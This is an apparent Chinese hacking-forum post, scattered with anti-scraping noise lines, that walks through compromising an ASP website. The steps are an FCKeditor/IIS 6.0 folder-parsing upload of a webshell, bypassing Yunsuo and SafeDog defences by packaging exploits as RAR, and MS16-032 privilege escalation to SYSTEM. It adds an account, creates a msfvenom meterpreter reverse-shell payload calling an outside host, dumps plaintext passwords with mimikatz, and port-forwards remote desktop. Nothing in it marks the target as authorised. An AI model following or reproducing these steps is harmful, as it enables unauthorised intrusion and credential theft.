|
7 _7 f8 A4 J, t
" [7 @% Y% r: F; F# L! d
* ?2 j9 H/ \6 A7 P! [
8 j; d: n: N7 j' P; O |
; q2 {- U/ p) I) u( n ( `4 D |+ s1 v: S" n; {
; D, v+ g% B8 w一、 利用getwebshell篇
9 F1 ]$ J8 T) h# T$ k
$ S. L8 {6 p5 s* r
首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图:
# O# G) E- h) T4 |$ |2 J2 `
% d5 a/ O8 U+ M$ s3 k
5 O7 l: m K9 Q, X
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
7 K. a& W% S/ y7 r
) ?$ v* G0 v" p" N a6 o. i& E
下面我们构造一个asp目录,如:
' W! @ L; L* J/ Y w5 d / [, L% F* o8 {) b; B' L! \. Y
8 Y& i& t- x' t http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
* C3 x7 i- |# L
" F2 F9 m. k6 i p; O: A- e+ `
$ F; e2 X* D' x) G+ E% A 然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
. T2 [ Z A2 j
: a+ |2 b. X- x% W, ^
一、 绕过安全狗云锁提权并且加账号
3 h8 _9 ]9 I- _" p* x
( _3 \* j6 }1 D, I9 m+ M
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干
8 i5 M% t4 _# {( _' D0 b
4 |$ E1 C+ f) h" Y' Z% c) f如图:
1 Q6 G( U2 o. h8 M
7 w( V5 t/ n1 r3 J/ C1 q+ C然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
; v8 a2 g8 G k% ~" ?0 H
) u& B- C1 T$ b0 ^$ I, ~6 j一、 利用metasploit
/ a) Y( r9 q! c4 v- m( u5 X# s7 b1 |
8 i V- _- a8 n" |
首先用pentestbox生成一个64位的payload如下命令
8 L9 n; S: p* x6 r( F+ ?5 W
* T6 S+ }5 h; H6 L+ p
msfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe
1 _( ?( `# L/ g: o! M5 u
3 [8 Q' e' B9 E; H# n为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
; P, R, ?. j8 p8 F
7 k$ g4 g8 ]8 B; O- Y3 {
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图:
+ D4 O, V3 e. f9 k3 ?
8 K2 _# ?9 G! \& `8 O6 c/ g6 \8 ^( ?
下面我们来做一个监听如下命令:
& s8 C& ~3 R& ~& j! P' D
- L9 |5 [6 Y4 {* }. K1 pportfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
6 A5 e" ^& t& v" x9 M# k
* k' Y+ e1 V/ k6 z# i( Z4 e
; _0 D9 |4 V; X0 P" V | , S- x& i' w) M% Y9 G
* v/ c0 t; U9 { Q+ {5 |
" r* l6 {/ H) ?" }# B , K. o8 s9 A. U2 h9 N: l" e
; Q. X0 h$ q, o s5 e
: [6 }/ z+ G1 {+ ?9 `3 l
+ @2 G7 P& y, e, g) ?" M: X- R
( v* Q4 s1 m7 m1 l7 u. I
7 e0 {) L, f' H7 A* m( ^
: H/ R- w; J$ ^. V+ X7 o \' i
) p3 q" D j( s! O) o& t
: P6 n- N. B; R( o7 {( {, O0 Z5 f( D3 u
! M: t9 x4 C, h- F+ a$ `6 u
| 
发表于 2018-10-20 20:31:43
收藏
支持
反对
匿名
发表于 2021-11-20 23:30:06